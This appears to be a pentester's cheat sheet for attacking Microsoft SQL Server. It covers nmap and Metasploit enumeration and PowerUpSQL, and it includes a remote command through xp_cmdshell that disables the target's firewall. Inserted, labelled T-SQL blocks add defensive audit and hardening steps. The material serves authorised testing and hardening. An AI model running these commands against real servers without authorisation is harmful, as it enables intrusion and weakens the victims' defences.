MSSQL - Microsoft SQL Server. Typically listens on TCP port 1433; an instance configured in hidden mode uses port 2433.
Enumeration
//NMAP - enumerate the server, version and info
nmap [IP]
nmap --script ms-sql-info -p 1433 [IP]
nmap -p 1433 --script ms-sql-ntlm-info --script-args mssql.instance-port=1433 [IP]
//Metasploit - enumerate mssql info
use auxiliary/admin/mssql/mssql_enum
set RHOSTS [IP]
exploit
mssql_exec
The mssql_exec admin module takes advantage of the xp_cmdshell stored procedure to execute commands on the remote system. If you have acquired or guessed MSSQL admin credentials, this can be a very useful module.
msf auxiliary(mssql_exec) > set CMD netsh firewall set opmode disable
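Added example, not from the original notes or from Metasploit: the two facts the mssql_exec module depends on (xp_cmdshell enabled, login holds sysadmin) can be checked directly from T-SQL, which is also the quickest way for a DBA to audit and close the setting. It uses only the documented sys.configurations view, sp_configure, and the IS_SRVROLEMEMBER / SUSER_SNAME functions; nothing about the target is assumed.

```sql
-- Added example (not from the original notes): audit what mssql_exec relies on.
-- Run as the login being assessed.

-- 1. Is xp_cmdshell enabled? value_in_use = 1 means it is live right now.
--    'show advanced options' must be 1 before the setting can be changed at all.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. Does the current login hold sysadmin? xp_cmdshell is sysadmin-only unless
--    a proxy account (xp_cmdshell_proxy_account) has been configured.
--    serveradmin matters too: it carries ALTER SETTINGS, enough to flip step 1.
SELECT SUSER_SNAME()                   AS login_name,
       IS_SRVROLEMEMBER('sysadmin')    AS is_sysadmin,
       IS_SRVROLEMEMBER('serveradmin') AS is_serveradmin;

-- 3. Hardening: switch xp_cmdshell off again if the audit found it enabled.
--    Requires ALTER SETTINGS (sysadmin or serveradmin).
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
```

A value of 1 in step 1 on a server that has no documented need for it is a finding in its own right; xp_cmdshell is off by default on every supported SQL Server version, so it being on means somebody enabled it.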
Enumerate SQL login accounts
// Metasploit - enumerate sql login accounts
use auxiliary/admin/mssql/mssql_enum_sql_logins
set RHOSTS [IP]
exploit
Enumerate domain accounts
//metasploit
use auxiliary/admin/mssql/mssql_enum_domain_accounts
set RHOSTS [IP]
exploit
PowerUpSQL
PowerUpSQL: A PowerShell Toolkit for Attacking SQL Server
SQL> SELECT * FROM fn_my_permissions(NULL, 'SERVER');
entity_name subentity_name permission_name
------------ --------------- ------------------
server CONNECT SQL
server VIEW ANY DATABASE
Check out the databases available:
SQL> SELECT name FROM master.sys.databases
name
-----------
master
tempdb
model
msdb
volume
I can look for user-generated tables in those databases:
SQL> use volume
[*] ENVCHANGE(DATABASE): Old Value: volume, New Value: volume
[*] INFO(QUERIER): Line 1: Changed database context to 'volume'.
SQL> SELECT name FROM sysobjects WHERE xtype = 'U'
name
------------
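Added example, not from the original notes: the three checks above (server permissions, visible databases, user tables) as one audit script that walks every database the login can reach instead of switching context by hand with `use`. It assumes SQL Server 2005 or later (the sys.* catalog views) and only the CONNECT permission the notes already show; sys.tables is the documented replacement for `sysobjects ... xtype = 'U'`. The cursor name `dbs` and the variable names are the example's own.

```sql
-- Added example (not from the original notes): audit what the current login can reach.

-- 1. Effective server-level permissions of the current login.
SELECT entity_name, permission_name
FROM fn_my_permissions(NULL, 'SERVER');

-- 2. Databases this login can see. VIEW ANY DATABASE makes the names visible;
--    HAS_DBACCESS() = 0 means the database itself is closed to this login.
SELECT name, state_desc, HAS_DBACCESS(name) AS has_access
FROM sys.databases
WHERE database_id > 4;              -- skip master, tempdb, model, msdb

-- 3. User tables in every accessible, online, non-system database.
DECLARE @db  sysname,
        @sql nvarchar(max);

DECLARE dbs CURSOR LOCAL FAST_FORWARD FOR
    SELECT name
    FROM sys.databases
    WHERE database_id > 4
      AND HAS_DBACCESS(name) = 1
      AND state_desc = 'ONLINE';

OPEN dbs;
FETCH NEXT FROM dbs INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME(@db) brackets the identifier; QUOTENAME(@db, '''') quotes it
    -- as a string literal, so an odd database name cannot break the query.
    SET @sql = N'SELECT ' + QUOTENAME(@db, '''') + N' AS db, '
             + N's.name AS [schema], t.name AS [table] '
             + N'FROM ' + QUOTENAME(@db) + N'.sys.tables AS t '
             + N'JOIN ' + QUOTENAME(@db) + N'.sys.schemas AS s ON s.schema_id = t.schema_id '
             + N'ORDER BY s.name, t.name;';
    EXEC sp_executesql @sql;
    FETCH NEXT FROM dbs INTO @db;
END
CLOSE dbs;
DEALLOCATE dbs;
```

Running this as a low-privilege login is a quick way for a DBA to confirm that VIEW ANY DATABASE and leftover database users do not expose more than intended; databases that show has_access = 1 for a login with no business need are the ones to review.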